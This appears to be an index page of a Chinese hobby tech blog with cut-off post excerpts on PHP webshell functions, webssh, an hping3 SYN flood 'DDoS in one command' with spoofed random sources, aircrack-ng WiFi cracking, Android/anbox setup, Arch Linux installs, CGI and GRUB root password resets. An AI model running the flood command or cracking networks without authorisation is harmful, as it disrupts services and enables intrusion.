PHP webshell 漏洞
webshells通过PHP脚本获取webshell
PHP函数system()1234<?php// Return the user the script is running undersystem("whoami");?>
exec()123456789101112131415<?php// Executes but returns nothingexec("ls -la");?><?php// Executes, returns only last line of the outputecho exec("ls -la");?><?php// Executes, returns the output in an arrayexec("ls -la",$array);print_r($array);?>
shellexec()1234<?php// Executes, returns the entire output as a string ...
建立webssh服务
webssh通过网页http协议ssh登录获取终端
最终效果通过域名shell.jumhorn.eu.org访问网页ssh客户端
安装1pip3 install webssh
配置使用nginx反向代理
123456789101112131415server { listen 80; server_name shell.jumhorn.eu.org; location / { proxy_pass http://127.0.0.1:8888; proxy_http_version 1.1; proxy_read_timeout 300; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_set_header Host $http_host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Real-PORT $remote_port; ...
一条命令实现DDOS
一条命令实现DDOS攻击这个工具可太强了,一会就把路由器发崩溃了,局域网的电脑也连不上了
工具
hping3
123456# debianapt install hping3# macbrew install hping# centosbrew install hping3
SYN DDOS攻击工具使用方法
12345# -S specifies sending SYN packets# -p 80 targets port 80# -i u20 waits 20 microseconds between packets = 50,000# packets per secondsudo hping3 -i u20 -S -p 80 -c 50000 ip(x.x.x.x)
隐藏自身IP地址模拟出多个IP攻击主机的情况
其实SYN攻击,只需要发送SYN包,返回的包根本不处理
所以SYN包的source_address可以随机填写
123# --rand-source random source address mode# --flood sent packets ...
仅为乐趣而写博客
blogjust for fun
ideas
安装和使用anbox
在centos上搭建vpn
多台公网服务器组建局域网
使用vpn
建立查找开放端口的对应IP服务
暴力破解wifi密码
mysql命令行登录的密码加密了吗
如果截获报文是可以看到客户端和服务器的机器类型的
搭建邮箱服务器
创建邮件列表相当于一个公用邮箱的转发和群发
Linux上使用Android模拟器
安装android模拟器在centos上安装anbox
https://github.com/anbox/anbox
工具
snap1234567891011# install snapdnf install snapd# make snap use proxy to download fastersnap install snap-store-proxysnap install snap-store-proxy-client# start snapd serversystemctl enable --now snapd.socket# enable classic snap supportln -s /var/lib/snapd/snap /snap
anbox1snap install anbox
配置使用FAQ
Android上使用sdcard作为内置存储卡
android6.0 支持用sd卡作为内置存储由此想到了家里的小米电视4C,500M的可用存储空间只能看一下小米下载的广告,变空间不足了
正好看到了android的新特性,便想拿小米电视做实验,没想到成功了,特别有成就感,所以想记录一下
工具
adb
adb是android-sdk下的工具,各个平台安装方法相似,以下推荐简单的安装方法
建议安装commandline-tools才100M大小对比android-studio 900M,还是命令行充满了简洁性
1234# debianapt install android-tools-adb # only 3M# macbrew install android-sdk
开始实践打开电视开发者选项
连续点击build number是android的通用方法 对于小米电视是连续点击产品型号,直到出现您已处于开发者模式即可
允许adb调试 在账号与安全页面允许adb调试
adb连接设备1234567# 连接到设备adb connect ip_of_device# adb在本地开启了一个服务,用完之后我会主动关闭它adb devic ...
腾讯云上安装archlinux
腾讯云安装archlinux准备工作
开放端口
服务器==>防火墙 先删除默认规则,再添加规则开放所有端口
确保可以vnc登录
vnc登录要设置密码
下载镜像https://mirrors.ustc.edu.cn/archlinux/iso
下载最新的archlinux镜像到云服务器
1wget https://mirrors.ustc.edu.cn/archlinux/iso/2022.10.01/archlinux-2022.10.01-x86_64.iso
编辑grub编辑/boot/grub2/grub.cfg,添加如下内容(有些系统路径/boot/grub/grub.cfg)
/dev/vda1 要用fdisk -l确定
1234567891011set timeout=60menuentry 'ArchISO' --class iso { insmod iso9660 set isofile=/archlinux-2022.10.01-x86_64.iso loopback loop0 $isofile ...
暴力破解WIFI密码
暴力破解wifi密码如果是我写代码肯定是一遍遍的尝试,使用不同的密钥去连接wif,但是aircrack-ng是先抓取包,然后用这些数据包测试密码集合,这样可以别人不知道的情况下破解wifi密码
工具1234# debianapt install aircrack-ng# macbrew install aircrack-ng
开始破解
简单的CGI尝试
CGI(common gateway interface)CGI是服务器的标准,也就是任意具有输入输出的编程语言都可以轻易编写CGI程序
python http server通过python的http模块作为server
12# 启动服务器python3 -m http.server --cgi
以下细节要注意
CGI脚本一定要放在cgi-bin目录下
CGI脚本一定要有执行权限
标准CGI脚本
bash脚本CGI
123456#!/bin/bashecho "Content-type: text/html"echo "" # 输出换行是http协议格式必须的2个换行echo "<html><body>Hello CGI</body></html>"
python脚本CGI
1234#!/bin/pythonprint("Content-type: text/html")print()print("<html><body&g ...
忘记root密码如何在grub界面修改
修改系统root密码此方法适用于忘记linux系统root密码时,进入到grub界面修改root密码
进入grub界面
选择当前操作系统,按下e键
找到linux开头的行
1linux /boot/vmlinuz-linux root-UUID=d474f2-e6a2-4cc3-9899-aa98af13 rw quiet
在后面添加init=/bin/bash后变成
1linux /boot/vmlinuz-linux root-UUID=d474f2-e6a2-4cc3-9899-aa98af13 rw quiet init=/bin/bash
按下ctrl+x
进入单用户模式
挂载文件系统
1mount -n -o remount,rw /
修改密码
1passwd
启动到正常模式
1exec /sbin/init